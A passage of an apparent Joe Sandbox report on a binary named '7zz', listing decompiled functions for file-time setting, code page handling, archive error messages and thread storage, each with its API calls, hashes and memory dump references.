                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: CRC$HCF$RSFX$-B
                                                                                                                                    • API String ID: 3519838083-950596765
                                                                                                                                    • Opcode ID: 474cd8cf904d7f3c27e8160fd81cc4e9dda077ce7626aaf2142c4045fb265860
                                                                                                                                    • Instruction ID: 6c3dbe44b38eb95146665e90f90a400f3930304e0ccaa8816579fca9b7e0a093
                                                                                                                                    • Opcode Fuzzy Hash: 474cd8cf904d7f3c27e8160fd81cc4e9dda077ce7626aaf2142c4045fb265860
                                                                                                                                    • Instruction Fuzzy Hash: 94E1C230A00529DBCF10EB95E8919EEB771EF44314FA0852FE44277291DB7CAA45CB6A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 004098CF Relevance: 9.1, APIs: 6, Instructions: 73filetimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004098CF(WCHAR* __ecx, FILETIME* __edx) {
				void* _t26;
				signed int _t27;
				signed int _t37;
				void* _t52;

				L0046B890(0x473a10, _t52);
				 *(_t52 - 0x18) = __edx;
				 *((intOrPtr*)(_t52 - 0x14)) = __ecx;
				if( *0x490a7c != 0) {
					_t26 = CreateFileW(__ecx, 0x40000000, 3, 0, 3, 0x2000000, 0);
					 *(_t52 - 0x10) = _t26;
					if(_t26 == 0xffffffff) {
						 *(_t52 - 0x24) = 0;
						 *((intOrPtr*)(_t52 - 0x20)) = 0;
						 *((intOrPtr*)(_t52 - 0x1c)) = 0;
						E00401E9A(_t52 - 0x24, 3);
						 *(_t52 - 4) =  *(_t52 - 4) & 0x00000000;
						if(L0040B863(_t52 - 0x24) != 0) {
							 *(_t52 - 0x10) = CreateFileW( *(_t52 - 0x24), 0x40000000, 3, 0, 3, 0x2000000, 0);
						}
						E00407A18( *(_t52 - 0x24));
					}
					_t37 = 0;
					if( *(_t52 - 0x10) != 0xffffffff) {
						_t37 = 0 | SetFileTime( *(_t52 - 0x10),  *(_t52 - 0x18),  *(_t52 + 8),  *(_t52 + 0xc)) != 0x00000000;
						CloseHandle( *(_t52 - 0x10));
					}
					_t27 = _t37;
				} else {
					SetLastError(0x78);
					_t27 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return _t27;
			}







                                                                                                                                    0x004098d4
                                                                                                                                    0x004098e3
                                                                                                                                    0x004098e6
                                                                                                                                    0x004098e9
                                                                                                                                    0x00409918
                                                                                                                                    0x0040991d
                                                                                                                                    0x00409920
                                                                                                                                    0x00409929
                                                                                                                                    0x0040992c
                                                                                                                                    0x0040992f
                                                                                                                                    0x00409932
                                                                                                                                    0x0040993a
                                                                                                                                    0x00409948
                                                                                                                                    0x00409959
                                                                                                                                    0x00409959
                                                                                                                                    0x0040995f
                                                                                                                                    0x00409964
                                                                                                                                    0x00409965
                                                                                                                                    0x0040996b
                                                                                                                                    0x00409984
                                                                                                                                    0x00409987
                                                                                                                                    0x00409987
                                                                                                                                    0x0040998e
                                                                                                                                    0x004098eb
                                                                                                                                    0x004098ed
                                                                                                                                    0x004098f3
                                                                                                                                    0x004098f3
                                                                                                                                    0x00409995
                                                                                                                                    0x0040999d

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 004098D4
                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 004098ED
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409918
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,00000003,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409957
                                                                                                                                    • SetFileTime.KERNEL32(000000FF,?,?,?,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409979
                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,40000000,00000003,00000000,00000003,02000000,00000000), ref: 00409987
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$Create$CloseErrorH_prologHandleLastTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1562325489-0
                                                                                                                                    • Opcode ID: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
                                                                                                                                    • Instruction ID: e76a05e07f1340f2f4d5a0f82b1dd14c97c15875a5f06524ffc792fdba8d9db0
                                                                                                                                    • Opcode Fuzzy Hash: a5c80a9bf8aac4bebe81e0320b0504ece2bb406e11bd7c606f3c9c216bf877a2
                                                                                                                                    • Instruction Fuzzy Hash: 7E218C71940209AAEF11AFA4DC02BEEBBB8EF48710F10453AE514B62E1D3790E00CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00471830 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E00471830(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0046E56A(0x19);
				_t50 = E004719DD(_a4);
				_t85 = _t50 -  *0x496228; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E00471A5A();
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x490638;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x490728;
							if(_t36 < 0x490728) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x49384c;
									if( *0x49384c == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x496444 =  *0x496444 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x496340, 0, _t60 << 2);
									asm("stosb");
									 *0x496228 = _t50;
									if(__eflags <= 0) {
										 *0x49623c =  *0x49623c & 0x00000000;
										__eflags =  *0x49623c;
									} else {
										__eflags = _v22;
										if(_v22 != 0) {
											_t63 =  &_v21;
											while(1) {
												_t69 =  *_t63;
												__eflags = _t69;
												if(_t69 == 0) {
													goto L24;
												}
												_t49 =  *(_t63 - 1) & 0x000000ff;
												_t70 = _t69 & 0x000000ff;
												while(1) {
													__eflags = _t49 - _t70;
													if(_t49 > _t70) {
														break;
													}
													 *(_t49 + 0x496341) =  *(_t49 + 0x496341) | 0x00000004;
													_t49 = _t49 + 1;
												}
												_t63 = _t63 + 2;
												__eflags =  *(_t63 - 1);
												if( *(_t63 - 1) != 0) {
													continue;
												}
												goto L24;
											}
										}
										L24:
										_t47 = _t81;
										do {
											 *(_t47 + 0x496341) =  *(_t47 + 0x496341) | 0x00000008;
											_t47 = _t47 + 1;
											__eflags = _t47 - 0xff;
										} while (_t47 < 0xff);
										 *0x496444 = E00471A27(_t50);
										 *0x49623c = _t81;
									}
									_t71 = 0x496230;
									asm("stosd");
									asm("stosd");
									asm("stosd");
									L31:
									E00471A83(_t50, _t71);
									goto L1;
								}
							}
							goto L33;
						}
						_v8 = _v8 & 0x00000000;
						_t55 = 0x40;
						memset(0x496340, 0, _t55 << 2);
						_t79 = _t65 + _t65 * 2 << 4;
						__eflags = _t79;
						asm("stosb");
						_t51 = _t79 + 0x490648;
						do {
							__eflags =  *_t51;
							_t57 = _t51;
							if( *_t51 != 0) {
								while(1) {
									_t66 = _t57[1];
									__eflags = _t66;
									if(_t66 == 0) {
										goto L21;
									}
									_t41 =  *_t57 & 0x000000ff;
									_t74 = _t66 & 0x000000ff;
									__eflags = _t41 - _t74;
									if(_t41 <= _t74) {
										_t19 = _v8 + 0x490630; // 0x8040201
										_t68 =  *_t19;
										do {
											 *(_t41 + 0x496341) =  *(_t41 + 0x496341) | _t68;
											_t41 = _t41 + 1;
											__eflags = _t41 - _t74;
										} while (_t41 <= _t74);
									}
									_t57 =  &(_t57[2]);
									__eflags =  *_t57;
									if( *_t57 != 0) {
										continue;
									}
									goto L21;
								}
							}
							L21:
							_v8 = _v8 + 1;
							_t51 =  &(_t51[8]);
							__eflags = _v8 - 4;
						} while (_v8 < 4);
						_t39 = _a4;
						 *0x49623c = 1;
						 *0x496228 = _a4;
						_t40 = E00471A27(_t39);
						_t71 = 0x496230;
						asm("movsd");
						asm("movsd");
						 *0x496444 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0046E5CB(0x19);
				return _t77;
			}
































                                                                                                                                    0x0047183b
                                                                                                                                    0x00471848
                                                                                                                                    0x0047184b
                                                                                                                                    0x00471852
                                                                                                                                    0x00471855
                                                                                                                                    0x0047185e
                                                                                                                                    0x00471860
                                                                                                                                    0x004719bc
                                                                                                                                    0x004719bc
                                                                                                                                    0x00471866
                                                                                                                                    0x00471866
                                                                                                                                    0x00471866
                                                                                                                                    0x00471868
                                                                                                                                    0x0047186d
                                                                                                                                    0x0047186d
                                                                                                                                    0x0047186f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00471871
                                                                                                                                    0x00471874
                                                                                                                                    0x00471875
                                                                                                                                    0x0047187a
                                                                                                                                    0x00000000
                                                                                                                                    0x0047187c
                                                                                                                                    0x00471881
                                                                                                                                    0x00471889
                                                                                                                                    0x0047188a
                                                                                                                                    0x0047188c
                                                                                                                                    0x004719b3
                                                                                                                                    0x004719ba
                                                                                                                                    0x004719cb
                                                                                                                                    0x004719cb
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00471892
                                                                                                                                    0x00471894
                                                                                                                                    0x0047189b
                                                                                                                                    0x004718a3
                                                                                                                                    0x004718a6
                                                                                                                                    0x004718a8
                                                                                                                                    0x004718a9
                                                                                                                                    0x004718af
                                                                                                                                    0x004719a0
                                                                                                                                    0x004719a0
                                                                                                                                    0x004718b5
                                                                                                                                    0x004718b5
                                                                                                                                    0x004718b9
                                                                                                                                    0x004718bf
                                                                                                                                    0x004718c2
                                                                                                                                    0x004718c2
                                                                                                                                    0x004718c4
                                                                                                                                    0x004718c6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004718cc
                                                                                                                                    0x004718d0
                                                                                                                                    0x004718d3
                                                                                                                                    0x004718d3
                                                                                                                                    0x004718d5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004718db
                                                                                                                                    0x004718e2
                                                                                                                                    0x004718e2
                                                                                                                                    0x00471970
                                                                                                                                    0x00471971
                                                                                                                                    0x00471975
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00471975
                                                                                                                                    0x004718c2
                                                                                                                                    0x0047197b
                                                                                                                                    0x0047197b
                                                                                                                                    0x0047197d
                                                                                                                                    0x0047197d
                                                                                                                                    0x00471984
                                                                                                                                    0x00471985
                                                                                                                                    0x00471985
                                                                                                                                    0x00471993
                                                                                                                                    0x00471998
                                                                                                                                    0x00471998
                                                                                                                                    0x004719a9
                                                                                                                                    0x004719ae
                                                                                                                                    0x004719af
                                                                                                                                    0x004719b0
                                                                                                                                    0x004719c1
                                                                                                                                    0x004719c1
                                                                                                                                    0x00000000
                                                                                                                                    0x004719c1
                                                                                                                                    0x0047188c
                                                                                                                                    0x00000000
                                                                                                                                    0x0047187a
                                                                                                                                    0x004718e5
                                                                                                                                    0x004718eb
                                                                                                                                    0x004718f6
                                                                                                                                    0x004718f8
                                                                                                                                    0x004718f8
                                                                                                                                    0x004718fb
                                                                                                                                    0x004718fc
                                                                                                                                    0x00471902
                                                                                                                                    0x00471902
                                                                                                                                    0x00471905
                                                                                                                                    0x00471907
                                                                                                                                    0x00471909
                                                                                                                                    0x00471909
                                                                                                                                    0x0047190c
                                                                                                                                    0x0047190e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00471910
                                                                                                                                    0x00471913
                                                                                                                                    0x00471916
                                                                                                                                    0x00471918
                                                                                                                                    0x0047191d
                                                                                                                                    0x0047191d
                                                                                                                                    0x00471923
                                                                                                                                    0x00471923
                                                                                                                                    0x00471929
                                                                                                                                    0x0047192a
                                                                                                                                    0x0047192a
                                                                                                                                    0x00471923
                                                                                                                                    0x0047192f
                                                                                                                                    0x00471930
                                                                                                                                    0x00471933
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00471933
                                                                                                                                    0x00471909
                                                                                                                                    0x00471935
                                                                                                                                    0x00471935
                                                                                                                                    0x00471938
                                                                                                                                    0x0047193b
                                                                                                                                    0x0047193b
                                                                                                                                    0x00471941
                                                                                                                                    0x00471944
                                                                                                                                    0x0047194f
                                                                                                                                    0x00471954
                                                                                                                                    0x0047195f
                                                                                                                                    0x00471964
                                                                                                                                    0x00471965
                                                                                                                                    0x00471967
                                                                                                                                    0x0047196c
                                                                                                                                    0x0047196c
                                                                                                                                    0x00000000
                                                                                                                                    0x00471857
                                                                                                                                    0x00471857
                                                                                                                                    0x00471857
                                                                                                                                    0x00471857
                                                                                                                                    0x004719ce
                                                                                                                                    0x004719d0
                                                                                                                                    0x004719dc

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0046E56A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5A7
                                                                                                                                      • Part of subcall function 0046E56A: EnterCriticalSection.KERNEL32(?,?,?,0046FF49,00000009,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046E5C2
                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,00000000,?,?,0046CFEB), ref: 00471881
                                                                                                                                      • Part of subcall function 0046E5CB: LeaveCriticalSection.KERNEL32(?,0046C0D0,00000009,0046C0BC,00000000,?,00000000,00000000,00000000), ref: 0046E5D8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterInfoInitializeLeave
                                                                                                                                    • String ID: 0bI$0bI$@cI$@cI
                                                                                                                                    • API String ID: 1866836854-605000347
                                                                                                                                    • Opcode ID: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
                                                                                                                                    • Instruction ID: f7c0c694ad5e617c113d7fbc1e97f9e30d3079020f4ba9ff39ded3c73c8e616e
                                                                                                                                    • Opcode Fuzzy Hash: fb2e5454b5c0239ef892e6083fb739233ab4ecf906b078c2986846cff91fd72d
                                                                                                                                    • Instruction Fuzzy Hash: 33415CF16042409EEB21DBBDD8917EA7BE09B05314F25C07BD68D862B2C33D494AC74E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401BE5 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                    			E00401BE5(void* __ecx) {
				intOrPtr* _t22;
				char* _t27;
				intOrPtr _t29;
				void* _t45;
				void* _t47;

				L0046B890(0x472d20, _t47);
				_t45 = __ecx;
				L00407CC0( *((intOrPtr*)(__ecx + 0x40)), 0x407ccd);
				_t29 =  *((intOrPtr*)(_t47 + 0xc));
				if(_t29 != 0) {
					E00407CD5( *((intOrPtr*)(__ecx + 0x40)), "Error: ");
					if(_t29 != 1) {
						if(_t29 != 0x8007000e) {
							_t22 = E00401C91(_t47 - 0x18, _t29);
							 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
							E00407CD5( *((intOrPtr*)(__ecx + 0x40)),  *_t22);
							 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
							E00407A18( *((intOrPtr*)(_t47 - 0x18)));
						} else {
							_push("Can\'t allocate required memory");
							goto L5;
						}
					} else {
						_t27 = "Can not open encrypted archive. Wrong password?";
						if( *((char*)(_t47 + 0x10)) == 0) {
							_t27 = "Can not open file as archive";
						}
						_push(_t27);
						L5:
						E00407CD5( *((intOrPtr*)(_t45 + 0x40)));
					}
					L00407CC0( *((intOrPtr*)(_t45 + 0x40)), 0x407ccd);
					 *((intOrPtr*)(_t45 + 0x28)) =  *((intOrPtr*)(_t45 + 0x28)) + 1;
					asm("adc dword [esi+0x2c], 0x0");
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return 0;
			}








                                                                                                                                    0x00401bea
                                                                                                                                    0x00401bf5
                                                                                                                                    0x00401c00
                                                                                                                                    0x00401c05
                                                                                                                                    0x00401c0a
                                                                                                                                    0x00401c14
                                                                                                                                    0x00401c1c
                                                                                                                                    0x00401c3f
                                                                                                                                    0x00401c4d
                                                                                                                                    0x00401c57
                                                                                                                                    0x00401c5b
                                                                                                                                    0x00401c63
                                                                                                                                    0x00401c67
                                                                                                                                    0x00401c41
                                                                                                                                    0x00401c41
                                                                                                                                    0x00000000
                                                                                                                                    0x00401c41
                                                                                                                                    0x00401c1e
                                                                                                                                    0x00401c22
                                                                                                                                    0x00401c27
                                                                                                                                    0x00401c29
                                                                                                                                    0x00401c29
                                                                                                                                    0x00401c2e
                                                                                                                                    0x00401c2f
                                                                                                                                    0x00401c32
                                                                                                                                    0x00401c32
                                                                                                                                    0x00401c71
                                                                                                                                    0x00401c76
                                                                                                                                    0x00401c7a
                                                                                                                                    0x00401c7a
                                                                                                                                    0x00401c86
                                                                                                                                    0x00401c8e

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID: Can not open encrypted archive. Wrong password?$Can not open file as archive$Can't allocate required memory$Error:
                                                                                                                                    • API String ID: 3519838083-4253456528
                                                                                                                                    • Opcode ID: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
                                                                                                                                    • Instruction ID: e96b05d5f5363979fc09c6e311170d97ed88631a387b5d6dedbde536d9aec6cb
                                                                                                                                    • Opcode Fuzzy Hash: f643b0d77a5193f8bda12cef83a72c641e5637254c1606468349ebd7a63f7bd3
                                                                                                                                    • Instruction Fuzzy Hash: 3D11C431A082049BEB24FA65D485A6F77B4AB44728F10493FE142676D1C7BDA8509B1A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0046E383 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E0046E383() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x48e060);
				if(_t16 == 0) {
					_t16 = L0046FE93(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x48e060, _t16) == 0) {
						E0046D03C(0x10);
					} else {
						E0046E370(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}






                                                                                                                                    0x0046e391
                                                                                                                                    0x0046e399
                                                                                                                                    0x0046e39d
                                                                                                                                    0x0046e3a8
                                                                                                                                    0x0046e3ae
                                                                                                                                    0x0046e3d8
                                                                                                                                    0x0046e3c1
                                                                                                                                    0x0046e3c2
                                                                                                                                    0x0046e3c8
                                                                                                                                    0x0046e3ce
                                                                                                                                    0x0046e3d2
                                                                                                                                    0x0046e3d2
                                                                                                                                    0x0046e3ae
                                                                                                                                    0x0046e3df
                                                                                                                                    0x0046e3e9

                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00000103,7FFFFFFF,0047064B,004710B4,00000000,?,?,00000000,00000001), ref: 0046E385
                                                                                                                                    • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0046E393
                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3DF
                                                                                                                                      • Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0046E3B7
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0046E3C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2020098873-0
                                                                                                                                    • Opcode ID: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
                                                                                                                                    • Instruction ID: 886707f6ee56ed2fdb0e8759095dced5a20534092e2ad5f091fc19cf1158f84c
                                                                                                                                    • Opcode Fuzzy Hash: 55fbcf2c7f2f4967b79abaeaadafaeb02b42f847358bd6d886319d930bf8ac5d
                                                                                                                                    • Instruction Fuzzy Hash: BAF062359003219BD7312B32BC0975E3B94EB427A1B10093AF959D67A0EBA888D1869A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00438A2E Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 286COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                    			E00438A2E(intOrPtr __ecx, signed char* __edx, void* __eflags) {
				void* __esi;
				signed int _t109;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int* _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t140;
				signed int _t143;
				signed int _t146;
				signed int _t150;
				signed int* _t153;
				signed int _t154;
				void* _t156;
				void* _t157;
				signed int* _t176;
				void* _t181;
				void* _t204;
				void* _t219;
				void* _t223;
				void* _t226;
				void* _t227;
				void* _t228;
				intOrPtr _t233;
				signed char** _t240;
				signed int* _t242;
				signed int* _t243;
				void* _t244;
				intOrPtr _t251;
				void* _t253;

				L0046B890(E00478310, _t253);
				_t240 =  *(_t253 + 0xc);
				 *(_t253 + 0xf) =  *(_t253 + 0xf) & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x20)) = __edx;
				_t240[1] = _t240[1] & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x28)) = __ecx;
				 *( *_t240) =  *( *_t240) & 0x00000000;
				 *__edx =  *__edx & 0x00000000;
				 *((intOrPtr*)(_t253 - 0x10)) = 0x200;
				_t109 = E0040FA74(__ecx, _t253 - 0x24c, _t253 - 0x10);
				if(_t109 != 0) {
					L41:
					 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
					return _t109;
				}
				_t251 =  *((intOrPtr*)(_t253 + 8));
				while( *((intOrPtr*)(_t253 - 0x10)) != 0) {
					if( *((intOrPtr*)(_t253 - 0x10)) != 0x200) {
						_push("There is no correct record at the end of archive");
						L12:
						E00409664(_t240);
						L13:
						_t109 = 0;
						goto L41;
					}
